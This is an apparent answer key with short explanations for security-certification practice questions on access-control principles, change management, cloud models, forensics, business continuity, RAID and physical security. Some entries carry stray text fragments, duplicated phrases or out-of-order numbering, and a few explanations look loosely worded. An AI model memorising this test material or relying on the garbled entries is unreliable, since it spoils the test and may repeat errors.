B. Software Configuration Management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

Answer 1031

D. A service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. This approach allows for different business applications to access the current web services available within the environment.

Answer 1032

D. A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.

Answer 1033

B. Web service provides the application functionality. The Web Services Description Language describes the web service’s specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service. lly bypassed

Answer 1034

C. The need-to-know policy operates on the basis that any given system user should be granted access only to portions of sensitive information or materials necessary to perform some task. The principle of least privilege ensures that personnel are granted only the permissions they need to perform their job and no more. Separation of duties ensures that no single person has total control over a critical function or system. There isn’t a standard principle called “as-needed basis.”

Answer 1035

C. Need to know is the requirement to have access to, knowledge about, or possession of data to perform specific work tasks, but no more. The principle of least privilege includes both rights and permissions, but the term principle of least permission is not valid within IT security. Separation of duties (SoD) ensures that a single person doesn’t control all the elements of a process. A separation of duties policy ensures that no single person has total control over a critical function. A job rotation policy requires employees to rotate to different jobs periodically.

Answer 1036

C. An organization applies the least privilege principle to ensure employees receive only the access they need to complete their job responsibilities. Need to know refers to permissions only, whereas privileges include both rights and permissions. A mandatory vacation policy requires employees to take a vacation in one- or two-week increments. An SLA identifies performance expectations and can include monetary penalties.

Answer 1037

D. Microsoft domains include a privileged account management solution that grants administrators elevated privileges when they need them but restrict the access using a time-limited ticket. The principle of least privilege includes both rights and permissions, but the term principle of least permission is not valid within IT security. Separation of duties ensures that a single person doesn’t control all the elements of a process or a critical function. Need to know is the requirement to have access to, knowledge about, or possession of data to perform specific work tasks, but no more.

Answer 1038

D. The default level of access should be no access. The principle of least privilege dictates that users should only be granted the level of access they need for their job, and the question doesn’t indicate that new users need any access to the database. Read access, modify access, and full access grants users some level of access, which violates the principle of least privilege.

Answer 1039

A. Each account should have only the rights and permissions needed to perform their job when following the least privilege policy. New employees would not need full rights and permissions to a server. Employees will need some rights and permissions in order to do their jobs. Regular user accounts should not be added to the Administrators group.

Answer 1040

C. Separation of duties ensures that no single entity can perform all the tasks for a job or function. A job rotation policy moves employees to different jobs periodically. A mandatory vacation policy requires employees to take vacations. A least privilege policy ensures users have only the privileges they need, and no more.

Answer 1041

A. A job rotation policy has employees rotate jobs or job responsibilities and can help detect collusion and fraud. A separation of duties policy ensures that a single person doesn’t control all elements of a specific function. Mandatory vacation policies ensure that employees take an extended time away from their jobs, requiring someone else to perform their job responsibilities, which increases the likelihood of discovering fraud. Least privilege ensures that users have only the permissions they need to perform their jobs and no more.

Answer 1042

B. Mandatory vacation policies help detect fraud. They require employees to take an extended time away from their jobs, requiring someone else to perform their job responsibilities, which increases the likelihood of discovering fraud. It does not rotate job responsibilities. Although mandatory vacations might help employees reduce their overall stress levels and increase productivity, these are not the primary reasons for mandatory vacation policies.

Answer 1043

C. A service-level agreement (SLA) can provide monetary penalties if a third-party provider doesn’t meet its contractual requirements. Neither a memorandum of understanding (MOU) nor an interconnection security agreement (ISA) includes monetary penalties. Separation of duties is sometimes shortened to SED, but this is unrelated to third-party relationships.

Answer 1044

A. The IaaS service model provides an organization with the most control compared to the other models, and this model requires the organization to perform all maintenance on operating systems and applications. The SaaS model gives the organization the least control, and the cloud service provider (CSP) is responsible for all maintenance. The PaaS model splits control and maintenance responsibilities between the CSP and the organization.

Answer 1045

C. The SaaS service model provides services such as email available via a web browser. IaaS provides the infrastructure (such as servers), and PaaS provides a platform (such as an operating system and application installed on a server). Public is a deployment method, not a service model.

Answer 1046

A. When images are used to deploy systems, the systems start with a common baseline, which is important for configuration management. Images don’t necessarily improve the evaluation, approval, deployment, and audits of patches to systems within the network. Although images can include current patches to reduce their vulnerabilities, this is because the image provides a baseline. Change management provides documentation for changes.

Answer 1047

C. An effective change management program helps prevent outages from unauthorized changes. Vulnerability management helps detect weaknesses but wouldn’t block the problems from this modification. Patch management ensures systems are kept up to date. Blocking scripts removes automation, which would increase the overall workload.

Answer 1048

B, C, D. Change management processes include requesting a change, creating a rollback plan for the change, and documenting the change. Changes should not be implemented immediately without evaluating the change.

Answer 1049

C. Change management aims to ensure that any change does not result in unintended outages or reduce security. Change management doesn’t affect personnel safety. A change management plan will commonly include a rollback plan, but that isn’t a specific goal of the program. Change management doesn’t perform any type of auditing.

Answer 1050

D. An effective patch management program evaluates and tests patches before deploying them and would have prevented this problem. Approving all patches would not prevent this problem because the same patch would be deployed. Systems should be audited after deploying patches, not to test for the impact of new patches.

Answer 1051

A. A patch management system ensures that systems have required patches. In addition to deploying patches, it would also check the systems to verify they accepted the patches. There is no such thing as a patch scanner. A penetration test will attempt to exploit a vulnerability, but it can be intrusive and cause an outage, so it isn’t appropriate in this scenario. A fuzz tester sends random data to a system to check for vulnerabilities but doesn’t test for patches.

Answer 1052

B. Vulnerability scanners are used to check systems for known issues and are part of an overall vulnerability management program. Versioning is used to track software versions and is unrelated to detecting vulnerabilities. Security audits and reviews help ensure that an organization is following its policies but wouldn’t directly check systems for vulnerabilities.

Answer 1053

D. A vulnerability scan will list or enumerate all security risks within a system. None of the other answers will list security risks within a system. Configuration management systems check and modify configuration settings. Patch management systems can deploy patches and verify patches are deployed, but they don’t check for all security risks. Hardware inventories only verify the hardware is still present.

Answer 1054

Correct answer and explanation: A. DevOps is a more agile development and support model, where developers directly support operations. Incorrect answers and explanations: Answers B, C, and D are incorrect. Sashimi, spiral, and waterfall are software development methodologies that do not describe a model for developers directly supporting operations.

Answer 1055

Correct answer and explanation: C. Polyinstantiation means “many instances,” such as two objects with the same names that have different data. Incorrect answers and explanations: Answers A, B, and D are incorrect. Delegation allows objects to delegate messages to other objects. Inheritance means an object inherits capabilities from its parent class. Polymorphism allows the ability to overload operators, performing different methods depending on the context of the input message.

Answer 1056

Correct answer and explanation: A. Entity integrity means each tuple has a unique primary key that is not null. Incorrect answers and explanations: Answers B, C, and D are incorrect. Normalization seeks to make the data in a database table logically concise, organized, and consistent. Referential integrity means that every foreign key in a secondary table matches a primary key in the parent table; if this is not true, referential integrity has been broken. Semantic integrity means each attribute (column) value is consistent with the attribute data type.

Answer 1057

Correct answer and explanation: Answer A is correct; acceptance testing determines whether software meets various end-state requirements from a user or customer, contract, or compliance perspective. Incorrect answers and explanations: Answers B, C, and D are incorrect. Integration testing tests multiple software components as they are combined into a working system. Regression testing tests software after updates, modifications, or patches. Unit testing consists of low-level tests of software components, such as functions, procedures, or objects.

Answer 1058

Correct answer and explanation: A. Cross-site request forgery (CSRF) allows a third party to redirect static content within the security context of a trusted site. Incorrect answers and explanations: Answers B, C, and D are incorrect. XSS is a third-party execution of web scripting languages, such as Javascript, within the security context of a trusted site. XSS is similar to CSRF; the difference is XSS uses active code. PHP RFI alters normal PHP variables to reference remote content, which can lead to execution of malicious PHP code. SQL injection manipulates a back-end SQL server via a front-end web server

Answer 1059

1. Answer: C. Control of evidence to maintain its integrity for court presentation Explanation: The primary focus of the chain of custody is to ensure the control and integrity of evidence so that it can be presented in court without any doubts about its authenticity.

Answer 1060

2.Answer: D. Predictive evidence Explanation: While corroborative, hearsay, and secondary are types of evidence mentioned, predictive evidence is not listed as a type of evidence in the context of a computer security investigation.

Answer 1061

3.Answer: A. A virus requires human interaction to trigger, while a worm can self-propagate. Explanation: A virus is a type of malware that requires some form of human interaction to be activated, such as opening a file. In contrast, a worm can spread on its own by exploiting vulnerabilities in systems.

Answer 1062

4. Answer: B. It looks harmless or desirable but contains malicious code. Explanation: A Trojan horse is a type of malware that appears to be something legitimate or desirable but contains hidden malicious code. It tricks users into downloading or running it, thinking it’s safe or beneficial.

Answer 1063

5. Answer: A. A backup that is an exact copy of a dataset without any compression Explanation: A mirror backup creates an exact replica of a dataset. It does not use compression, making it the fastest backup type in terms of both backup and restore, but it requires a significant amount of storage.

Answer 1064

6. Answer: B. Evidence that is stored in places like RAM, cache, and buffers of a running system Explanation: Live evidence refers to data stored in a running system’s volatile memory, such as RAM, cache, and buffers. This type of evidence can change or disappear if the system’s state is altered.

Answer 1065

8. Answer: B. Encryption Explanation: While detection, mitigation, and remediation are steps in the incident response process, encryption is not a step in this process. Encryption is a method to secure data.

Answer 1066

7. Answer: B. Agreements that denote time frames against the performance of specific operations Explanation: SLAs contain terms that specify related time frames against the performance of certain operations agreed upon within the overall contract.

Answer 1067

9. Answer: C. To monitor the behavior and patterns of users and entities Explanation: UEBA focuses on analyzing the behavior and patterns of users and entities, logging and correlating the underlying data, analyzing the data, and triggering alerts when necessary.

Answer 1068

10. Answer: C. Data diddler Explanation: A data diddler is a type of malware that makes minimal changes over a prolonged period to evade detection. Its primary goal is to subtly alter data without being noticed.

Answer 1069

11. Answer: C. Polymorphic malware Explanation: Polymorphic malware can change aspects of itself to evade detection every time it replicates across a network.

Answer 1070

12. Answer: C. Digital footprints Explanation: While oral/written statements, visual/audio evidence, and hearsay evidence are considered types of evidence in computer security investigations, “digital footprints” is not specifically mentioned as a type of evidence.

Answer 1071

13. Answer: B. To provide an effective and efficient response to reduce impact to the organization Explanation: The main goals of incident response are to provide an effective and efficient response to reduce the impact on the organization, maintain or restore business continuity, and defend against future attacks.

Answer 1072

14. Answer: A. RAID 0 Explanation: Single points of failure refer to components or parts of a system that, if they fail, will cause the entire system to fail. To mitigate these vulnerabilities, redundancy is often introduced. Among the options, RAID 0 does not provide redundancy. Instead, it stripes data across multiple disks, which can improve performance but does not eliminate a single point of failure. If one disk in a RAID 0 array fails, all data is lost. On the other hand, RAID 1, having a secondary Internet connection, and using a load-balanced server cluster all introduce redundancy and help in eliminating single points of failure. a u e.

Answer 1073

15. Answer: C. No information Explanation: Black box penetration testing simulates an external attack where the attacker has no prior knowledge of the target system. The red team, in this context, is given no specific details about the infrastructure they are testing. This approach is designed to mimic the perspective of a real-world attacker and identify vulnerabilities that may be exploited by someone with no inside knowledge. 16. Answer: D. Mean time between failures (MTBF)

Answer 1074

Explanation: MTBF (mean time between failures) is a measure used to estimate the time between inherent failures of a system during its operational phase. It provides an average time span between failures and is commonly used in reliability engineering to assess the reliability of a product or system. MTTR, on the other hand, refers to the average time taken to repair a failed component. MTD is the maximum time a service or system can be down without causing significant harm to the business. Statistical deviation is a general term and does not specifically relate to the functional lifetime of a system or device.

Answer 1075

17. Answer: C. The process of transitioning files from high-cost, high-speed storage to more affordable, slower storage solutions Explanation: Hierarchical Storage Management (HSM) is a data storage technique that automatically moves data between high-cost and low-cost storage media. As data ages and is accessed less frequently, it is moved to slower, more cost-effective storage media. This ensures that critical and frequently accessed data remains on faster storage, while older, less accessed data is moved to cheaper storage.

Answer 1076

18. Answer: B. Passive reconnaissance Explanation: Passive reconnaissance involves collecting information without directly interacting with the target system. A sniffer, which captures network traffic, is a tool that can be used during this phase to gather valuable information without alerting the target. Active reconnaissance, on the other hand, involves direct interaction with the target, which can raise alarms.

Answer 1077

19. Answer: B. Implementing separation of duties and rotating job responsibilities Explanation: Collusion refers to the act of two or more individuals working together to commit fraud or other malicious activities. The best defense against collusion is the separation of duties, ensuring that no single individual has control over all aspects of any critical transaction. Job rotation further reduces the risk by regularly changing individuals’ responsibilities, making it harder for them to collaborate maliciously over an extended period.

Answer 1078

20. Answer: D. To counteract privilege accumulation Explanation: Privilege accumulation, often referred to as “authorization creep,” occurs when individuals retain old privileges even after changing roles within an organization. Over time, this can lead to users having more access rights than necessary for their current position, increasing the risk of accidental or intentional data misuse. By revoking Nicole’s previous privileges upon her transfer, the organization ensures she only has access to what’s relevant to her new role, maintaining a principle of least privilege.

Answer 1079

21. Answer: C. The strategy of transitioning files from high-speed, high-cost storage to more economical, slower storage media Explanation: Hierarchical Storage Management (HSM) is a data storage technique that moves data between high-cost and low-cost storage media based on its age and access frequency. As data becomes older and is accessed less frequently, it is transferred to slower, more economical storage solutions.

Answer 1080

22. Answer: C. Sandbox Explanation: A sandbox is a controlled environment where potentially malicious code can be executed safely, without posing a risk to the host system or network. It is isolated from the main system, ensuring that any malicious actions are contained within the sandbox and do not affect the broader environment.

Answer 1081

23. Answer: B. Ensuring the employee is rejuvenated Explanation: While ensuring an employee is well rested is a good general practice for employee well being, it is not specifically a security or operational reason related to mandatory vacations. The other options relate directly to security and operational benefits.

Answer 1082

24. Answer: D. Detective Explanation: An audit trail is a record of activities, typically in the context of a computer system, which can be used to detect and investigate unauthorized or anomalous activities. It is a detective control because it helps in identifying issues after they have occurred.

Answer 1083

25. Answer: B. Prolonged recovery time Explanation: RAID is designed to provide redundancy, improve performance, and increase storage capacity. One of its primary benefits is fault tolerance, which means that if one disk fails, data is not lost. However, prolonged recovery time is not a benefit; in fact, certain RAID configurations aim to reduce recovery time.

Answer 1084

27. Answer: C. PBX systems Explanation: Phreakers are individuals who manipulate or hack telephone systems, primarily targeting Private Branch Exchange (PBX) systems. Their activities often involve making free long distance calls or gaining unauthorized access to telecommunication systems.

Answer 1085

26. Answer: A. Dual controls Explanation: Separation of duties and dual controls are both strategies to ensure that no single individual has complete control over all aspects of any critical financial transaction. By requiring two or more individuals to complete a task or transaction, the risk of fraud or error is reduced.

Answer 1086

28.Answer: B. Graylist Explanation: Graylisting is an anti-spam technique where the mail server temporarily rejects emails from unknown senders and asks the sending server to resend the message after a certain period. If the email is legitimate, the sending server will attempt to resend it, and it will be accepted on the subsequent attempt.

Answer 1087

31. Answer: A. Incremental Explanation: Incremental backups only save the changes made since the last backup, making them faster to perform. However, during a restore, you would need the last full backup and all subsequent incremental backups, making the restoration process longer compared to other backup methods.

Answer 1088

29.Answer: D. COOP (continuity of operations plan) Explanation: A continuity of operations plan (COOP) is designed to ensure that essential functions continue during and after a disaster. It focuses on restoring an organization’s mission-essential functions at an alternate site and performing those functions for up to 30 days before returning to normal operations.

Answer 1089

30. Answer: A. RAID 0 Explanation: RAID 0 uses data striping, where data is split into blocks and each block is written to a separate disk drive. It improves performance but offers no redundancy. If one drive fails, all data in the RAID 0 array is lost.

Answer 1090

32. Answer: B. Statistical based Explanation: A statistical-based intrusion detection system (IDS) monitors network traffic and compares it against an established baseline. The baseline will identify what is considered “normal” behavior. When the IDS detects activity that deviates significantly from the baseline, it will trigger an alert.

Answer 1091

33. Answer: C. Zeroization Explanation: Zeroization is the process of erasing sensitive data by overwriting it with zeros. This ensures that the original data is unrecoverable.

Answer 1092

34. Answer: C. RAID 10 Explanation: RAID 10, also known as RAID 1+0, combines the features of RAID 1 (mirroring) and RAID 0 (striping). It stripes data across mirrored pairs. As a result, it offers both performance improvements (from striping) and redundancy (from mirroring).

Answer 1093

35. Answer: D. JBOD (Just a Bunch of Disks) Explanation: JBOD stands for “Just a Bunch of Disks” or “Just a Bunch of Drives.” It is a method of combining multiple hard drives into one logical unit, but without any RAID features like redundancy or performance improvement. Each drive operates independently, and the total storage is the sum of all drives.

Answer 1094

36. Answer: C. Distributed computing Explanation: Distributed computing involves using multiple computers, often spread across vast distances, to work together on a single task. This approach can harness a massive amount of processing power by breaking down a problem into smaller parts and processing them concurrently across multiple machines. It’s particularly useful for tasks that require extensive computational resources.

Answer 1095

37. Answer: B. A sanctioned set of preparations and adequate procedures to react to disasters Explanation: A business continuity/disaster recovery plan is a comprehensive approach that outlines how an organization will continue its operations and recover from unforeseen disasters. It’s not just about preventing disasters but having a structured and approved response when they occur.

Answer 1096

38. Answer: C. Due diligence Explanation: Due diligence refers to the care that a reasonable person or organization exercises to avoid harm to others or their property. It’s a general principle that applies across industries, ensuring that organizations act responsibly and with caution.

Answer 1097

39. Answer: A. Continuity planning is a paramount organizational concern encompassing all organizational areas or functions. Explanation: Business continuity planning should be holistic, addressing all parts of an organization. While technology recovery is essential other While technology recovery is essential, other functions like human resources, operations, and supply chain management are equally crucial.

Answer 1098

40.Answer: A. Determine the effects of a threat on organizational operations Explanation: Business impact analysis (BIA) is conducted to understand the potential effects of disruptions on an organization’s operations. It helps in identifying critical functions and the impact if these functions were to be interrupted.

Answer 1099

41.Answer: D. Instituting procedural controls Explanation: Implementing procedural controls is a proactive approach to manage threats and mitigate the effects of potential events. These controls provide structured guidelines and processes to ensure that risks are minimized and managed effectively.

Answer 1100

42.Answer: A. To discourage or eliminate the risk Explanation: The main purpose of implementing controls or safeguards is to deter potential threats or to mitigate the associated risks, ensuring that the organization’s assets and operations remain secure.

Answer 1101

43.Answer: D. A business impact analysis determines the consequences of disruptions on the organization. Explanation: Business impact analysis (BIA) is primarily concerned with understanding the potential effects of disruptions on an organization’s operations. It helps in identifying critical functions and the impact if these functions were to be interrupted.

Answer 1102

44. Answer: B. The technological environment Explanation: Disaster recovery primarily focuses on the recovery of IT systems and data after a disaster. It’s a subset of business continuity planning and emphasizes the restoration of IT infrastructure, systems, and data.

Answer 1103

45.Answer: A. Business impact analysis Explanation: Business impact analysis (BIA) is the process of determining the potential effects of interruptions to an organization’s operations. It helps organizations understand the potential consequences of various disruptions and prioritize recovery strategies.

Answer 1104

46. Answer: A. It’s a more cost-effective recovery option. Explanation: A cold site is a backup facility that is not immediately ready for use but can be equipped and made operational relatively quickly. Its primary advantage is that it’s typically less expensive than other recovery options, such as hot sites, which are fully equipped and ready for immediate use.

Answer 1105

47. Answer: B. Threats, assets, and controls to mitigate them Explanation: Risk is typically understood in terms of potential threats to assets and the controls in place to mitigate those threats. It’s a combination of the likelihood of an event occurring and the potential impact if it does.

Answer 1106

48. Answer: A. The maximum duration a service or system can be down Explanation: RTO, or recovery time objective, refers to the target time within which a business process or IT system must be restored after a disruption to avoid unacceptable consequences.

Answer 1107

51. Answer: D. Interrupting a live production application or function Explanation: Halting a live production application or function can have real-world consequences and is not a recommended method for testing a business continuity plan. The other options are controlled exercises designed to test various aspects of the plan without causing disruptions.

Answer 1108

49. Answer: A. Full backup Explanation: A full backup captures all the data in an entire system or subsystem. When restoring from a full backup, all the data can be retrieved in one operation, making it the most efficient restore method.

Answer 1109

52. Answer: A. To pinpoint the strengths and weaknesses of the plan Explanation: The primary goal of a business continuity exercise is to test the plan in a controlled environment, allowing the organization to identify areas where the plan excels and areas that need improvement.

Answer 1110

50. Answer: B. It’s highly available. Explanation: A hot site is a fully equipped data center that can take over operations almost immediately after a disaster. Its primary advantage is its high availability, ensuring minimal disruption to operations.

Answer 1111

56. Answer: A. RAID 6 with a hot site alternative Explanation: A recovery point objective (RPO) of zero means no data loss is acceptable. RAID 6 provides fault tolerance and can handle two simultaneous drive failures. Paired with a hot site, which is a fully equipped data center ready for immediate use, this combination ensures both data integrity and rapid recovery. RAID 0, on the other hand, offers no redundancy and is not suitable for scenarios where data loss is unacceptable.

Answer 1112

53. Answer: D. As part of the configuration and change management procedure Explanation: Business continuity plans should be updated regularly to reflect changes in the organization’s environment, operations, or risk profile. Integrating updates into the configuration and change management process ensures that the plan remains current and relevant.

Answer 1113

54. Answer: A. Support from senior leadership Explanation: While all the options are important, the support and commitment of senior leadership are the support and commitment of senior leadership are crucial for the success of business continuity. Their support ensures that the necessary resources are allocated, and it emphasizes the importance of continuity planning throughout the organization.

Answer 1114

55. Answer: A. Cold site Explanation: A cold site is a backup facility that is not immediately ready for use but can be equipped and made operational within a certain time frame. Given a recovery time objective of two months, a cold site would be the most cost-effective and suitable option.

Answer 1115

57. Answer: B. Detect, delay, and respond Explanation: The primary function of a physical protection system is to detect any unauthorized activities or intrusions, delay the intruder’s progress, and respond to the situation, either by alerting security personnel or initiating other security measures.

Answer 1116

58. Answer: A. Threat definition, target identification, and facility characterization Explanation: A comprehensive vulnerability assessment requires understanding the potential threats, identifying potential targets, and characterizing the facility’s features and vulnerabilities.

Answer 1117

60. Answer: B. Defense in depth Explanation: Defense in depth is a security strategy that employs multiple layers of defense to protect assets. This approach ensures that if one layer is breached, additional layers remain to provide protection.

Answer 1118

59.Answer: C. Windows at street level, entrances, and other access points Explanation: Laminated glass is designed to remain intact even when shattered, making it ideal for areas vulnerable to break-ins or accidental damage, such as street-level windows and doorways.

Answer 1119

61. Answer: C. Crime prevention through environmental design Explanation: Crime prevention through environmental design (CPTED) is a multidisciplinary approach to deterring criminal behavior through environmental design. It focuses on designing a physical environment that positively influences human behavior, making spaces less conducive to crime and more conducive to positive social interaction.

Answer 1120

64. Answer: B. 5 fc Explanation: Adequate lighting is essential for safety in perimeter areas. A level of 5 foot-candles (fc) is commonly recommended for such zones to ensure visibility and deter potential threats.

Answer 1121

62.Answer: A. Integration of individuals, processes, and equipment Explanation: An effective physical protection system relies on the harmonious integration of people (who operate and respond to the system), procedures (the guidelines and protocols in place), and equipment (the physical and technological tools used).

Answer 1122

63. Answer: B. Ensure only authorized individuals gain entry Explanation: The primary purpose of access control is to ensure that only those with the appropriate permissions or credentials can enter a specific area or facility, thereby maintaining security.

Answer 1123

65. Answer: C. Acoustic/shock glass-break sensors Explanation: Acoustic or shock glass-break sensors detect the specific frequencies or vibrations associated with breaking glass, making them ideal for buildings with accessible windows.

Answer 1124

66. Answer: A. Monitoring, deterrence, and evidence collection Explanation: CCTV systems primarily serve to monitor areas, act as a deterrent to potential intruders or malicious actors, and provide evidence in case of incidents.

Answer 1125

67.Answer: B. Enhancement of the security framework, often leading to cost savings for the organization Explanation: When security technologies are appropriately implemented, they can bolster the organization’s security measures. This not only enhances protection but can also lead to operational efficiencies and cost savings in the long run.

Answer 1126

68. Answer: B. In relation to the specified threats and the worth of the organization’s assets Explanation: A meaningful assessment of a facility should be conducted to understand the potential threats against it and to evaluate the security measures in place relative to the value of the assets it houses.

Answer 1127

69. Answer: A. Minimizing the number of entrances that need monitoring, staffing, and protection Explanation: When designing a facility with security as a priority, it’s crucial to limit potential vulnerabilities. By reducing the number of entrances, the facility can more effectively monitor, staff, and secure those points of entry.

Answer 1128

70.Answer: C. To record the duration of the visit, the person visited, and to account for everyone in emergencies Explanation: A visitor’s log serves multiple purposes, but its primary function is to maintain a record of individuals entering and exiting the facility. This ensures that in case of emergencies, there’s an accurate account of everyone present, enhancing safety and accountability.

Answer 1129

71. Answer: A. Tamper protection Explanation: Tamper protection mechanisms are designed to prevent unauthorized access or interference with the physical components of an alarm system. If someone tries to tamper with the system, an alert is typically triggered, ensuring the system’s integrity and reliability.

Answer 1130

72. Answer: A. Cable locks, encryption, password safeguards, and heightened awareness Explanation: Portable devices are vulnerable to theft or unauthorized access. Employing physical measures like cable locks, combined with digital security measures like encryption and password protection, and fostering a heightened awareness among users are the best practices to ensure their security.

Answer 1131

73. Answer: A. Biometric devices Explanation: Biometric devices authenticate individuals based on their unique physical or behavioral characteristics. These can include fingerprints, retina or iris patterns, voice recognition, and facial recognition, among others.

Answer 1132

74. Answer: A. Layers Explanation: The layered approach to physical security ensures that multiple levels of protection are in place. If one layer is breached, additional layers remain to provide protection, making it more challenging for unauthorized individuals to gain access or cause damage.

Answer 1133

75. Answer: B. Security survey Explanation: A security survey provides a comprehensive overview of a facility’s security posture. It evaluates physical security controls, policies, procedures, and ensures the safety of employees, identifying potential vulnerabilities and areas for improvement.

Answer 1134

76. Answer: B. Turnstiles Explanation: Turnstiles are physical barriers that allow only one person to pass at a time, making it difficult for someone to “piggyback” or “tailgate” behind an authorized individual. They are especially effective in high-security areas or entrances where strict access control is required.

Answer 1135

77. Answer: C. Internal actors or employees Explanation: While all the listed entities pose threats, insiders often have direct access to an organization’s systems and data, making them a significant risk. They might exploit their access for malicious purposes, either intentionally or inadvertently.

Answer 1136

78. Answer: C. The global nature of computer crime activities Explanation: Computer crime often transcends borders, making jurisdiction and international cooperation challenging. While all the options present challenges, the international nature of cybercrime complicates investigations, prosecution, and prevention.

Answer 1137

79. Answer: A. Legal principles Explanation: Computer forensics involves the collection, analysis, and preservation of digital evidence in a manner that is legally admissible in a court of law. Thus, it marries technical expertise with legal principles.

Answer 1138

80. Answer: D. Locard’s exchange principle Explanation: Dr. Edmond Locard posited that every contact leaves a trace. This means that criminals will always leave some evidence behind at a crime scene and simultaneously take something with them.

Answer 1139

83. Answer: B. Civil law Explanation: Civil law, also known as code-based or codified law, is based on comprehensive statutes and codes that emphasize abstract legal principles. It is influenced by legal scholars and is distinct from common law systems.

Answer 1140

81. Answer: B. Be exhaustive, be genuine, and be permissible in court. Explanation: For evidence to be effective in a legal setting, it must be complete (covering all aspects of the matter), authentic (verifiable and genuine), and admissible (acceptable in a court of law).

Answer 1141

82. Answer: B. Legal action Explanation: While prosecution might be an outcome or follow-up to an incident response, it is not typically considered a phase of the incident response process itself. The primary stages often include preparation, identification, containment, eradication, recovery, and lessons learned/documentation.

Answer 1142

85. Answer: A. Brand mark (trademark) Explanation: Trademarks protect symbols, names, and slogans used to identify goods or services. They safeguard the goodwill and brand recognition a company has built.

Answer 1143

84. Answer: C. Literary and artistic works protection (copyright) Explanation: Copyrights protect the expression of ideas, such as writings, music, and art. They do not protect the underlying ideas themselves.

Answer 1144

86. Answer: C. IOCE, SWGDE, and ACPO Explanation: IOCE (International Organization on Computer Evidence), SWGDE (Scientific Working Group on Digital Evidence), and ACPO (Association of Chief Police Officers) are all recognized entities that provide guidelines and best practices in the field of computer forensics.

Answer 1145

87.Answer: A. No-cost software, open source, and paid software (freeware, open source, and commercial) Explanation: Freeware is software that is available at no cost. Open source software is software for which the original source code is made freely available and may be redistributed and modified. Commercial software is sold for profit.

Answer 1146

88.Answer: A. Personal rights (privacy) Explanation: Privacy pertains to the rights and obligations of individuals and organizations concerning the collection, use, retention, and disclosure of personal information.

Answer 1147

89.Answer: C. Spotting, recognizing, alerting (detection, identification, notification) Explanation: Triage in incident response typically involves detecting the incident, identifying its nature, and notifying relevant stakeholders.

Answer 1148

90. Answer: A. By comparing digital signatures with the original (comparing hash totals to the original source) Explanation: Hash values (like MD5 or SHA-256) are used to verify the integrity of data. If the hash value of the original matches the hash value of the copy, it indicates that the copy is an exact replica of the original.

Answer 1149

91. Answer: D. Have minimal interference (must have the least amount of contamination that is possible) Explanation: While it’s crucial to preserve the integrity of a digital crime scene, it’s also understood that some interaction might be necessary for investigation. The goal is to minimize any changes or contamination.

Answer 1150

92. Answer: A. All legal and compliance responsibilities are transferred to the service provider. Explanation: While the service provider has its own set of responsibilities, the primary organization remains ultimately responsible for ensuring compliance. It’s essential to ensure that any outsourced services meet the required compliance standards. Answer: C It uses the order in which the principles

Answer 1151

93. Answer: C. It uses the order in which the principles are listed (the order of the canons). Explanation: The ISC2 Code of Ethics uses the order of its canons (principles) to prioritize and resolve conflicts.

Answer 1152

94. Answer: D. Approach every incident as if it might lead to legal action (treat every incident as though it may be a crime) Explanation: By treating every incident as a potential crime, organizations ensure that evidence is preserved and handled correctly from the outset.

Answer 1153

95. Answer: D. Contact a professional data recovery service, explain the situation, and ask them to create a forensic image. Explanation: Professional data recovery services have the expertise and equipment to handle such situations. They can ensure that the data is retrieved without further damaging the drive or compromising the integrity of the evidence.

Answer 1154

96.Answer: A. Infrastructure as a Service (IaaS) Explanation: Infrastructure as a Service (IaaS) provides an organization with the most control over its cloud resources, including virtual machines, storage, and networking. However, this level of control comes with the responsibility of managing and maintaining the operating systems and applications. Unlike PaaS and SaaS, where the cloud provider takes on more of the management burden, IaaS requires the organization to handle all aspects of maintenance and administration.

Answer 1155

98.Answer: B. Anomaly-based IDS Explanation: Anomaly-based IDS systems are effective in detecting zero-day attacks because they identify deviations from established baselines, rather than relying on known signatures

Answer 1156

97. Answer: B. On a dedicated logging server Explanation: Storing log files on a dedicated logging server is generally the most secure method as it isolates the logs from potential compromise of the application or system being monitored.